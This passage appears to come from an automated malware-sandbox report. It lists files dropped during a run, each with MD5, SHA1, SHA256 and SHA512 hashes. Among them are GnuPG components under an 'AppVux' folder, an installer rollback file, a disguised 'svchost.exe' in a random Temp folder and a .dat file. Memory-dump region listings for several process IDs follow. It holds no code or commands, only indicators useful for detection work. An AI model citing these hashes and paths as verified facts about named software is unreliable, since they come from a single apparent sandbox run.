| SHA512 | 3d5110f0e5244a58f426fbb72e17444d571141515611e65330ecfeabdcc57ad3a89a1a8b2dc573da6192212fb65c478d335a86678a883a1a1b68ff88ed624659 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 43e1ae2e432eb99aa4427bb68f8826bb |
| SHA1 | eee1747b3ade5a9b985467512215caf7e0d4cb9b |
| SHA256 | 3d798b9c345a507e142e8dacd7fb6c17528cc1453abfef2ffa9710d2fa9e032c |
| SHA512 | 40ec0482f668bde71aeb4520a0709d3e84f093062bfbd05285e2cc09b19b7492cb96cdd6056281c213ab0560f87bd485ee4d2aeefa0b285d2d005634c1f3af0b |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | 9d43b5e3c7c529425edf1183511c29e4 |
| SHA1 | 07ce4b878c25b2d9d1c48c462f1623ae3821fcef |
| SHA256 | 19c78ef5ba470c5b295dddee9244cbd07d0368c5743b02a16d375bfb494d3328 |
| SHA512 | c8a1c581c3e465efbc3ff06f4636a749b99358ca899e362ea04b3706ead021c69ae9ea0efc1115eae6bbd9cf6723e22518e9bec21f27ddaafa3cf18b3a0034a7 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-2-0.dll
| MD5 | d175430eff058838cee2e334951f6c9c |
| SHA1 | 7f17fbdcef12042d215828c1d6675e483a4c62b1 |
| SHA256 | 1c72ac404781a9986d8edeb0ee5dd39d2c27ce505683ca3324c0eccd6193610a |
| SHA512 | 6076086082e3e824309ba2c178e95570a34ece6f2339be500b8b0a51f0f316b39a4c8d70898c4d50f89f3f43d65c5ebbec3094a47d91677399802f327287d43b |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 6c3fcd71a6a1a39eab3e5c2fd72172cd |
| SHA1 | 15b55097e54028d1466e46febca1dbb8dbefea4f |
| SHA256 | a31a15bed26232a178ba7ecb8c8aa9487c3287bb7909952fc06ed0d2c795db26 |
| SHA512 | ef1c14965e5974754cc6a9b94a4fa5107e89966cb2e584ce71bbbdd2d9dc0c0536ccc9d488c06fa828d3627206e7d9cc8065c45c6fb0c9121962ccbecb063d4f |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-string-l1-1-0.dll
| MD5 | 7a15b909b6b11a3be6458604b2ff6f5e |
| SHA1 | 0feb824d22b6beeb97bce58225688cb84ac809c7 |
| SHA256 | 9447218cc4ab1a2c012629aaae8d1c8a428a99184b011bcc766792af5891e234 |
| SHA512 | d01dd566ff906aad2379a46516e6d060855558c3027ce3b991056244a8edd09ce29eacec5ee70ceea326ded7fc2683ae04c87f0e189eba0e1d38c06685b743c9 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\stylers.model.xml
| MD5 | 343b8f55f376e88674733286d027f834 |
| SHA1 | 466886054d5c2641ba6058f58a7a84053aa4696e |
| SHA256 | f002b36e70f0fb159885c21fa6e6395176cd50a254201a94cbed756d9843fa9a |
| SHA512 | ef6643badbb87739f0ae847d201651f8d3e677c54ca2aa3f81277b053355772f71d9b0f490617c104ce861a29e2b283fe6d82faf4cfe8f10bfc571d683cfea8e |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libintl-8.dll
| MD5 | 16b4dba3e3bfdea7a528cc97721cbe60 |
| SHA1 | 2a75d604f72ea1d1d929280b6b945b168a18f137 |
| SHA256 | b6939316ebc272b67fa90a8c599dceec0e22b93a7a9660c7b0db0ff1cc1308ae |
| SHA512 | 4d524e689a064a2a1d381033f05f635f0e5cb5863d0c1dd1cee4bf80303e0bf3db8d787ff52d348c6938bacea7ac695de10da747782696d18172951452a98ef9 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-wks-client.exe
| MD5 | ee38ab14557b765c80856531582f4f89 |
| SHA1 | 660b872aaadd6658729f943f78bb45699e38f7c6 |
| SHA256 | 4b0dfcc928a127b65928f6a941823b0e43c4cf08e2792e1e054a3886d51d8005 |
| SHA512 | 4c4690c7af542ad5d67121259ec25dd67565273ea791f1a7e0536193f74115fb309054c44e336b19fee273dde71ab8543a2810a10dc2ba9eca5c7b286b46bcca |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgtar.exe
| MD5 | a33215c3311b5819d6f12400b49333ab |
| SHA1 | 8d9338414b6e17cb9454b26b410abf7381e68eba |
| SHA256 | 45d80a39499a2dbfa3352169a7fb78492f7a253ca3ec6b0a6f61825b7c3a235d |
| SHA512 | 219fcc80b0362004ece4aeec22f93085166de6e8969b45c26f671412ff3b238c95e14f439a6efd8d06177fe790c781ddfd21e8a21a6100bfb8b08bd2e69d5973 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgsm.exe
| MD5 | c1bb0e52c1e07b706804c5262207852a |
| SHA1 | 741d5972d06c09f7eb3c85dd573e302ff80d55e4 |
| SHA256 | e7d50bfc7ea031e4438b227e5f3c1c231aac831ccb709b08f6d4e3106d448b5e |
| SHA512 | cd6d04bc70a77ee6299e2d7c0e832c1104fd16ffd0243e6bff36910850cccb17fca86a297369bb0cb7c19ef674adc2089aaac3fa173184ec1f93bbb123957295 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\dirmngr.exe
| MD5 | 2e94c3258f7863b6bf4ea937aa12a144 |
| SHA1 | c5bf59d3b038f9bb9f7e05706e9e80f21ff3b022 |
| SHA256 | 2cc38c48eb742a28a4562bc62c9dca7ef525a62164752135b45a4cff89064e6e |
| SHA512 | 0925f11504f6972ede8525d3f7050060034a785963772a8b0f8d38d9feba47c1f9f55dafc959eea1d1789d8a4fbe03639c3f44ae848aef971d1a51371ce1fe2b |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libassuan-0.dll
| MD5 | 4f1849e84694314b868505c1dcc53747 |
| SHA1 | 06b8274e2569b32b5f9cf36202952e70b2fb4b02 |
| SHA256 | f69073ed88c6e72ae3244ca310bb43892eb97a4ede9e20fa457e0d8fb72a3b24 |
| SHA512 | 1956d6a9963b5eb712e7e61bccb3846677622838889b3de1820cc99f0b2aec81e3fba3456275f06be0b6a9ec573a502b38de7f0d32393447b385cad53c426d50 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gnupg.exe
| MD5 | e7a712a20275825b93d9b86464755870 |
| SHA1 | 64bd04917a18d2faa75c46470461d550733aea61 |
| SHA256 | 4e6f3f339ded64578816dfc3dc1d74ba198f7d698109c15ac658bb9891e2ea9e |
| SHA512 | c1ef6aca74b674386521a54c435524cd1adfb70e5fb43fee48929ba1ff631f7e2cba2c773fc6976c72b7095c0e8c73e0766a3977f2cb8798560cbaada9cfcec3 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\zlib1.dll
| MD5 | f191ee2ae39bd67d4cc12c3667634d42 |
| SHA1 | e37aac8dc0da948eab6f24bbcd8495790cf99fd6 |
| SHA256 | df230f50a409db9ee949b9fdb10d7c08de03b5e3a0f72e7feb2618e436e1967a |
| SHA512 | 9e8d4eb00225cb646a8f5cbd8a36d9994150dd1b16029d9e9c0cdf5158f71642a761c887dcf680517a164770429f37f04412448351d9247f9cf2d2da6694c7ab |
C:\Config.Msi\e5ac807.rbs
| MD5 | ca4adf13d5bc7c3af0d84bc58a1bbe36 |
| SHA1 | aa1c69eb5f9300f9c9ffb8441db359f577ad7ae0 |
| SHA256 | ca322b1fbe8346a514a9583c6c9fb93c7231565990ff51e55fede78d303bdf70 |
| SHA512 | 7dff8de500fda6c5e27ffd4098bcd6d487048c9ab5d68fc0bf1111dd2cdc64a570d3b50d059207596dae45f42492ecef79b44963040611b52cf4e5170befed65 |
memory/1604-658-0x0000000000820000-0x0000000000845000-memory.dmp
memory/4288-659-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1604-660-0x0000000000400000-0x000000000053E000-memory.dmp
memory/4288-661-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1604-662-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/1604-665-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/1604-667-0x0000000066580000-0x00000000666AA000-memory.dmp
memory/4288-664-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1604-663-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4288-666-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/1640-681-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp
memory/1640-682-0x000002349E200000-0x000002349E210000-memory.dmp
memory/1640-683-0x000002349E200000-0x000002349E210000-memory.dmp
memory/1640-684-0x000002349E210000-0x000002349E232000-memory.dmp
memory/1640-692-0x000002349E3C0000-0x000002349E436000-memory.dmp
memory/1640-710-0x000002349E200000-0x000002349E210000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe
| MD5 | a9c5924063a253f64fb86bc924be6996 |
| SHA1 | c39ba1e011318b3edf295d4bdde3d56b5de89972 |
| SHA256 | eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4 |
| SHA512 | 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e |
memory/1640-734-0x000002349E200000-0x000002349E210000-memory.dmp
memory/4288-743-0x0000000000C60000-0x0000000000C88000-memory.dmp
memory/4288-744-0x0000000000120000-0x0000000000220000-memory.dmp
memory/4288-745-0x00000000054B0000-0x0000000005538000-memory.dmp
memory/4288-746-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/4288-748-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/4288-749-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp
memory/4288-750-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/4288-752-0x00000000744F0000-0x00000000746B2000-memory.dmp
memory/3040-753-0x0000000002780000-0x0000000002789000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kyV4XPwc2QRqDcs..dat
| MD5 | f0f942c7faac4695ff0e7002a21a12a6 |
| SHA1 | f9f1c24d6494aabe71b1d18da68cb2fbf77d4add |
| SHA256 | eb203f4ad6ae7bab5e9608b3fd3e1d2e014393b9131dd46bb09640a299ef1006 |
| SHA512 | 5b18e7f41e00f622aad2b176011cf5498f7f7fdd4a5c93f95b3502bb060c9a3d62548640d93e3d8a9043bcb63aa68e420b5c468480d0894baff1802e460a9ac7 |
memory/3040-757-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/3040-759-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp
memory/3040-761-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/1640-758-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp
memory/3040-763-0x00000000744F0000-0x00000000746B2000-memory.dmp
memory/1640-764-0x000002349E200000-0x000002349E210000-memory.dmp
memory/3040-762-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp
memory/3040-765-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/3040-766-0x00000000044E0000-0x00000000048E0000-memory.dmp
memory/4288-771-0x00000000054B0000-0x0000000005538000-memory.dmp
memory/4288-772-0x0000000006610000-0x0000000006A10000-memory.dmp
memory/1640-773-0x000002349E200000-0x000002349E210000-memory.dmp
memory/1640-783-0x000002349E200000-0x000002349E210000-memory.dmp